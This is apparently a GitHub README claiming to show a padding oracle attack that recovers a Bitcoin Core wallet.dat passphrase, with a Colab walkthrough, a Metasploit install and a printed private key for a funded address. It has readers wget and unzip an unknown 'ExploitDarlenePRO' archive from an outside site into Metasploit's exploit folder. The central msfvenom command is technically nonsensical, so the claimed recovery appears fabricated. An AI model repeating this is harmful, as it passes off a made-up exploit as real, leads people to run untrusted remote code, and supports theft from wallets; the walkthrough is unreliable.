Skip to content

demining/Padding-Oracle-Attack-on-Wallet.dat

Repository files navigation

Padding Oracle Attack on Wallet.dat password decryption for the popular wallet Bitcoin Core



In this article, we will use the classification of common attack patterns from the cybersecurity resource [CAPEC™] . The “Padding Oracle Attack” was first discussed on Wallet.dat back in 2012 (on the vulnerability management and threat analysis platform “VulDB” ) . The problem of the most popular Bitcoin Core wallet affects the work  AES Encryption Paddingin the file Wallet.dat

The technical details of this attack are known:


An attacker can effectively decrypt data without knowing the decryption key if the target system leaks information about whether a padding error occurred when decrypting the ciphertext. A target system that transmits this type of information becomes a padding oracle, and an attacker can use this oracle to efficiently decrypt the data without knowing the decryption key, issuing an average of 128*bcalls to the padding oracle (where bis the number of bytes in the ciphertext block). In addition to performing decryption, an attacker can also create valid ciphertexts (i.e., perform encryption) using a padding oracle, all without knowing the encryption key.


Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet

Any cryptosystem can be vulnerable to padding oracle attacks if encrypted messages are not authenticated to ensure their validity before decryption, and then the padding error information is passed on to the attacker. This attack method can be used, for example, to break CAPTCHA systems or decrypt/modify state information stored in client-side objects (such as hidden fields or cookies). 


Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet

This attack method is a side-channel attack on a cryptosystem that uses leaked data from a poorly implemented decryption procedure to completely undermine the cryptosystem. A single bit of information that tells an attacker whether a padding error occurred during decryption, in whatever form it may be, is enough for the attacker to break the cryptosystem. This bit of information may come in the form of an explicit completion error message, a blank page being returned, or even that the server is taking longer to respond (a timing attack).


Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet

This attack can be launched in cross-domain mode, where the attacker can use cross-domain information leaks to obtain bits of information from the padding oracle from the target system/service that the victim is interacting with.


Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet

In symmetric cryptography, a padding oracle attack can be performed in the AES-256-CBC encryption mode (which is used by Bitcoin Core), in which the “oracle” (the source) communicates whether the padding of the encrypted message is correct or not. Such data could allow attackers to decrypt messages through the oracle using the oracle key  without knowing the encryption key.


Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core walletPadding Oracle Attack Process on Wallet.dat

Let’s move on to the practical part and perform a series of actions through the exploit in order to fill out the oracle in the Wallet.dat file in the process and ultimately find the password we need in binary format.

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core walletCapture The Flag (CTF)

Earlier, researchers and tournament participants CTFmade public a hacked [ wallet.dat 2023 ] Bitcoin Wallet: 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b in the amount of :  44502.42 US dollars // BITCOIN: 1.17461256 BTC


Let’s follow the link to releases Bitcoin Core version 22.1



Index of /bin/bitcoin-core-22.1/


../
test.rc1/                                          08-Nov-2022 18:08                   -
test.rc2/                                          28-Nov-2022 09:39                   -
SHA256SUMS                                         14-Dec-2022 17:59                2353
SHA256SUMS.asc                                     14-Dec-2022 17:59               10714
SHA256SUMS.ots                                     14-Dec-2022 17:59                 538
bitcoin-22.1-aarch64-linux-gnu.tar.gz              14-Dec-2022 17:59            34264786
bitcoin-22.1-arm-linux-gnueabihf.tar.gz            14-Dec-2022 18:00            30424198
bitcoin-22.1-osx-signed.dmg                        14-Dec-2022 18:00            14838454
bitcoin-22.1-osx64.tar.gz                          14-Dec-2022 18:00            27930578
bitcoin-22.1-powerpc64-linux-gnu.tar.gz            14-Dec-2022 18:00            39999102
bitcoin-22.1-powerpc64le-linux-gnu.tar.gz          14-Dec-2022 18:00            38867643
bitcoin-22.1-riscv64-linux-gnu.tar.gz              14-Dec-2022 18:01            34114511
bitcoin-22.1-win64-setup.exe                       14-Dec-2022 18:01            18771672
bitcoin-22.1-win64.zip                             14-Dec-2022 18:01            34263968
bitcoin-22.1-x86_64-linux-gnu.tar.gz               14-Dec-2022 18:01            35964880
bitcoin-22.1.tar.gz                                14-Dec-2022 18:01             8122372
bitcoin-22.1.torrent                               14-Dec-2022 18:01               49857



Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet


NECESSARILY! Restart QT Program // Restart Bitcoin Core

Press the keys:Ctrl + Q

You need to restart the program QTin order to synchronize the newwallet.dat

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet

Let’s check using the getaddressinfo command Bitcoin Wallet:  1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b 

getaddressinfo "address"

Return information about the given bitcoin address.
Some of the information will only be present if the address is in the active wallet.

Let’s run the command:

getaddressinfo 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b 

Result:

{
  "address": "1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b",
  "scriptPubKey": "76a9147774801e52a110aba2d65ecc58daf0cfec95a09f88ac",
  "ismine": true,
  "solvable": true,
  "desc": "pkh([7774801e]02ad103ef184f77ab673566956d98f78b491f3d67edc6b77b2d0dfe3e41db5872f)#qzqmjdel",
  "iswatchonly": false,
  "isscript": false,
  "iswitness": false,
  "pubkey": "02ad103ef184f77ab673566956d98f78b491f3d67edc6b77b2d0dfe3e41db5872f",
  "iscompressed": true,
  "ischange": false,
  "timestamp": 1,
  "labels": [
    ""
  ]
}
Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet

Let’s run the dumpprivkey command to get the private key to the Bitcoin Wallet:  1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b 

dumpprivkey "address"

Reveals the private key corresponding to 'address'.
Then the importprivkey can be used with this output

Let’s run the command:

dumpprivkey 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b

Result:

Error: Please enter the wallet passphrase with walletpassphrase first. (code -13)

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet

We see that access to the private key of the Bitcoin Wallet  is password protected.

passphrase ?!?!?
passphrase ?!?!?
passphrase ?!?!?

Let’s run and decrypt the password into binary format, for this we will need to install the Bitcoin Core integration/staging treePadding Oracle Attack на Wallet.dat repositories ; for this you can open the finished file from  Jupyter Notebook  and upload it to the  Google Colab  notebook )


https://colab.research.google.com/drive/1rBVTPyePTMjwXganiwkHfz59vcAtN5Wt


Milk Sad vulnerability in the Libbitcoin Explorer 3.x library, how the theft of $900,000 from Bitcoin Wallet (BTC) users was carried outht tps://github.com/demining/CryptoDeepTools/tree/main/27PaddingOracleAttackonWalletdat

Padding_Oracle_Attack_on_Wallet_dat.ipynb


Let’s open the Google Colab service using the link: https://colab.research.google.com


Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet

Click on "+"and “Create a new notepad”


Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet

Install Ruby in Google Colab

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet


To run the programs we need, we will install the object-oriented programming language Ruby


!sudo apt install ruby-full

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet


Let’s check the installation version


!ruby --version
Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core walletRuby version 3.0.2p107 (2021-07-07 revision 0db68f0233) [x86_64-linux-gnu]

Let’s install a library 'bitcoin-ruby'for interacting with the Bitcoin protocol/network


!gem install bitcoin-ruby

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet


Let’s install a library 'ecdsa'for implementing the Elliptic Curve Digital Signature Algorithm (ECDSA)


!gem install ecdsa

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet


Let’s install a library 'base58'to convert integer or binary numbers to base58and from.


!gem install base58

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet

Let’s install a library 'crypto'to simplify operations with bytes and basic cryptographic operations


!gem install crypto

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet

Let’s install a library 'config-hash'to simplify working with big data.


!gem install config-hash -v 0.9.0

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet

Let’s install the Metasploit Framework and use MSFVenom

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet

Let’s install the Metasploit Framework from GitHub and use the MSFVenom tool to create the payload.


Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet


!git clone https://github.com/rapid7/metasploit-framework.git

ls

cd metasploit-framework/

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet


Let’s see the contents of the folder"metasploit-framework"


ls

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet

Options:

!./msfvenom -help 

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet





Let’s install Bitcoin Core integration/staging tree in Google Colab:

!git clone https://github.com/bitcoin/bitcoin.git


ls

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet


Let’s go through the directory to the file: aes.cpp to integrate the exploit to launch Padding Oracle Attack on Wallet.dat

cd bitcoin/src/crypto/

ls

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet


Open the file: aes.cpp using the cat utility

cat aes.cpp

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet

To carry out the attack, upload the file: wallet.dat to the directory: bitcoin/src/crypto/

Let’s use the utility wgetand download wallet.dat from the 27PaddingOracleAttackonWalletdat repositories

!wget https://github.com/demining/CryptoDeepTools/raw/29bf95739c7b7464beaeb51803d4d2e1605ce954/27PaddingOracleAttackonWalletdat/wallet.dat

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet


Let’s check the contents of the directory: bitcoin/src/crypto/

ls

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet


Let’s go back toMetasploit Framework

cd /

cd content/metasploit-framework/

ls

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet


Let’s open the folders according to the directory:/modules/exploits/

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet

Download "ExploitDarlenePRO"from the catalogue:/modules/exploits/

cd modules/

ls

cd exploits/

!wget https://darlene.pro/repository/fe9b4545d58e43c1704b0135383e5f124f36e40cb54d29112d8ae7babadae791/ExploitDarlenePRO.zip

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet


Unzip the contents ExploitDarlenePRO.zipusing the utilityunzip

!unzip ExploitDarlenePRO.zip

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet


Let’s go through the catalogue:/ExploitDarlenePRO/

ls

cd ExploitDarlenePRO/

ls
Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet

To run the exploit, let’s go back toMetasploit Framework

cd /

cd content/metasploit-framework/

ls

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet


We need to identify our LHOST (Local Host)attacking  IP-addressvirtual machine.

Let’s run the commands:

!ip addr
!hostname -I
Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet

Let’s use the tool to create a payload MSFVenom

For operation, select Bitcoin Wallet: 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b 

Launch command:

!./msfvenom 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b -p modules/exploits/ExploitDarlenePRO LHOST=172.28.0.12 -f RB -o decode_core.rb -p bitcoin/src/crypto LHOST=172.28.0.12 -f CPP -o aes.cpp -p bitcoin/src/crypto LHOST=172.28.0.12 -f DAT -o wallet.dat

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet

Result:

1111111001010001100010110100011010011111011101001010111001011110010111000011101101000101010100001111000000011110010001110001110001011000111101001101110010010010101001101011110100010010100011011011001010111100110100110011100100001110110101001110111011100101

We need to save the resulting binary format to a file: walletpassphrase.txtwe will use a Python script .

Team:

import hashlib

Binary = "1111111001010001100010110100011010011111011101001010111001011110010111000011101101000101010100001111000000011110010001110001110001011000111101001101110010010010101001101011110100010010100011011011001010111100110100110011100100001110110101001110111011100101"

f = open("walletpassphrase.txt", 'w')
f.write("walletpassphrase " + Binary + " 60" + "\n")
f.write("" + "\n")
f.close()

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet


Open the file: walletpassphrase.txt

ls
cat walletpassphrase.txt

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet


Result:

walletpassphrase 1111111001010001100010110100011010011111011101001010111001011110010111000011101101000101010100001111000000011110010001110001110001011000111101001101110010010010101001101011110100010010100011011011001010111100110100110011100100001110110101001110111011100101 60

The password to access the private key has been found!


Let’s use the command dumpprivkey "address"via the consoleBitcoin Core

Teams:

walletpassphrase 1111111001010001100010110100011010011111011101001010111001011110010111000011101101000101010100001111000000011110010001110001110001011000111101001101110010010010101001101011110100010010100011011011001010111100110100110011100100001110110101001110111011100101 60

dumpprivkey 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet


Result:

KyAqkBWTbeR3w4RdzgT58R5Rp7RSL6PfdFDEkJbwjCcSaRgqg3Vz

Private Key Received!


Let’s install the libraryBitcoin Utils

pip3 install bitcoin-utils

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet


Let’s run the code to check the compliance of Bitcoin Addresses:

Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet


Private key WIF: KyAqkBWTbeR3w4RdzgT58R5Rp7RSL6PfdFDEkJbwjCcSaRgqg3Vz
Public key: 02ad103ef184f77ab673566956d98f78b491f3d67edc6b77b2d0dfe3e41db5872f
Address: 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b
Hash160: 7774801e52a110aba2d65ecc58daf0cfec95a09f

--------------------------------------

The message to sign: CryptoDeepTech
The signature is: ILPeG1ThZ0XUXz3iPvd0Q6ObUTF7SxmnhUK2q0ImEeepcZ00npIRqMWOLEfWSJTKd1g56CsRFa/xI/fRUQVi19Q=
The signature is valid!

That’s right! The private key corresponds to the Bitcoin Wallet.


Let’s open  bitaddress  and check:

ADDR: 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b
WIF:  KyAqkBWTbeR3w4RdzgT58R5Rp7RSL6PfdFDEkJbwjCcSaRgqg3Vz
HEX:  3A32D38E814198CC8DD20B49752615A835D67041C4EC94489A61365D9B6AD330
Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet

https://www.blockchain.com/en/explorer/addresses/btc/1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b


Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet
Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet
Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet

BALANCE: $ 44502.42



References:


This material was created for the  CRYPTO DEEP TECH portal  to ensure financial security of data and elliptic curve cryptography  secp256k1 against weak ECDSA  signatures   in the  BITCOIN cryptocurrency . The creators of the software are not responsible for the use of materials.


Source

Telegram: https://t.me/cryptodeeptech

Video: https://youtu.be/0aCfT-kCRlw

Source: https://cryptodeeptech.ru/padding-oracle-attack-on-wallet-dat


Padding Oracle Attack on Wallet.dat password decryption for the popular Bitcoin Core wallet